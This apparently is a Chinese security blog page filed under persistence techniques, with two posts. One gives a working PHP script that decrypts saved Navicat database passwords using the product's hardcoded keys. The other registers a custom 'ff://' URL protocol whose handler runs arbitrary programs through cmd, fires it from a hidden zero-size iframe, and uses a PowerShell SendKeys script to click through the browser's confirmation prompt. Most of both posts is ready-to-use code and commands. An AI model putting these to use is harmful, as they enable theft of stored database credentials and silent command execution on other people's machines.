分类 权限维持 下的文章

navicat解密保存密码

使用php解密密码

我在coderunner中运行php。这个稍微改了可以单文件直接用了。替换下方的密码字段,和选择删除注释对应版本行

<?php

namespace FatSmallTools;

class NavicatPassword
{
    protected $version = 0;
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;

    public function __construct($version = 12)
    {
        $this->version = $version;
        $this->blowKey = sha1('3DC5CA39', true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }

    public function encrypt($string)
    {
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->encryptEleven($string);
                break;
            case 12:
                $result = $this->encryptTwelve($string);
                break;
            default:
                break;
        }

        return $result;
    }

    protected function encryptEleven($string)
    {
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;

        for ($i = 0; $i < $round; $i++) {
            $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
            $currentVector = $this->xorBytes($currentVector, $temp);
            $result .= $temp;
        }

        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }

        return strtoupper(bin2hex($result));
    }

    protected function encryptBlock($block)
    {
        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING); 
    }

    protected function decryptBlock($block)
    {
        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING); 
    }

    protected function xorBytes($str1, $str2)
    {
        $result = '';
        for ($i = 0; $i < strlen($str1); $i++) {
            $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
        }

        return $result;
    }

    protected function encryptTwelve($string)
    {
        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        return strtoupper(bin2hex($result));
    }

    public function decrypt($string)
    {
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->decryptEleven($string);
                break;
            case 12:
                $result = $this->decryptTwelve($string);
                break;
            default:
                break;
        }

        return $result;
    }

    protected function decryptEleven($upperString)
    {
        $string = hex2bin(strtolower($upperString));

        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;

        for ($i = 0; $i < $round; $i++) {
            $encryptedBlock = substr($string, 8 * $i, 8);
            $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
            $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
            $result .= $temp;
        }

        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }

        return $result;
    }

    protected function decryptTwelve($upperString)
    {
        $string = hex2bin(strtolower($upperString));
        return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
}


use FatSmallTools\NavicatPassword;

//需要指定版本,11或12
//$navicatPassword = new NavicatPassword(11);
$navicatPassword = new NavicatPassword(12);

//解密
//$decode = $navicatPassword->decrypt('15057D7BA390');
$decode = $navicatPassword->decrypt('764057479667225EEF500CD6E6F88FCD');
echo $decode."\n";

-w900

x4IiVuKLYx

https://github.com/HyperSine/how-does-navicat-encrypt-password
https://github.com/tianhe1986/FatSmallTools

自定义URL Protocol协议+模拟点击拉起应用/执行命令

起因是有个开发的朋友在群里问到怎么用js检测系统是否存在某应用。

-w327

后来想了下,一般都是利用js+URL Protocol来拉起应用,而且拉起过程中会出现选择。
之前刚刚做了个c# bypass uac中模拟了回车键。
这回直接用这个执行命令应该也可以。

注册自定义URL协议

add.reg

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\ff]
"URL Protocol"=""
@="Genaral Call"
[HKEY_CLASSES_ROOT\ff\DefaultIcon]
@=""
[HKEY_CLASSES_ROOT\ff\shell]
[HKEY_CLASSES_ROOT\ff\shell\open]
[HKEY_CLASSES_ROOT\ff\shell\open\command]
@="cmd /v:on /k set m=%1 &&call set n=%%m:ff://=%%&call set n=%%n:,= %% &&start !n! &exit"

测试URl

 ff://C:/windows/system32/calc.exe

-w1311
-w476

如何触发

浏览器对协议地址发起请求,那么我用iframe来嵌入窗口,而且iframe可以设置宽高为零彻底隐藏。

<iframe src="ff://C:/net1.exe.lnk"></iframe>

执行命令思路

  1. 可以利用注册协议的参数
    ff://参数1[,参数2,参数3]
    其中参数1是要打开的本地程序的完整路径;参数2,参数3是要传递给该本地程序的参数,
    2、可以利用lnk文件来执行
    -w693

模拟点击组合实现命令执行

1.ps1

C:\1.html   //打开1.html调用url
$myshell = New-Object -com "Wscript.Shell" 
$myshell.AppActivate("chrome") //激活title是chrome进程的焦点
start-sleep -s 1
$myshell.sendkeys("{TAB}")
$myshell.sendkeys("{ENTER}") //发送 tab和回车

Jietu20200406-010911

同样修改下ps1的发送键位和激活名称比如IE是WINDOWS$myshell.AppActivate("windows")
也可以实现命令执行。

Jietu20200406-015303

Jietu20200406-015351
Jietu20200406-155246

Jietu20200406-155239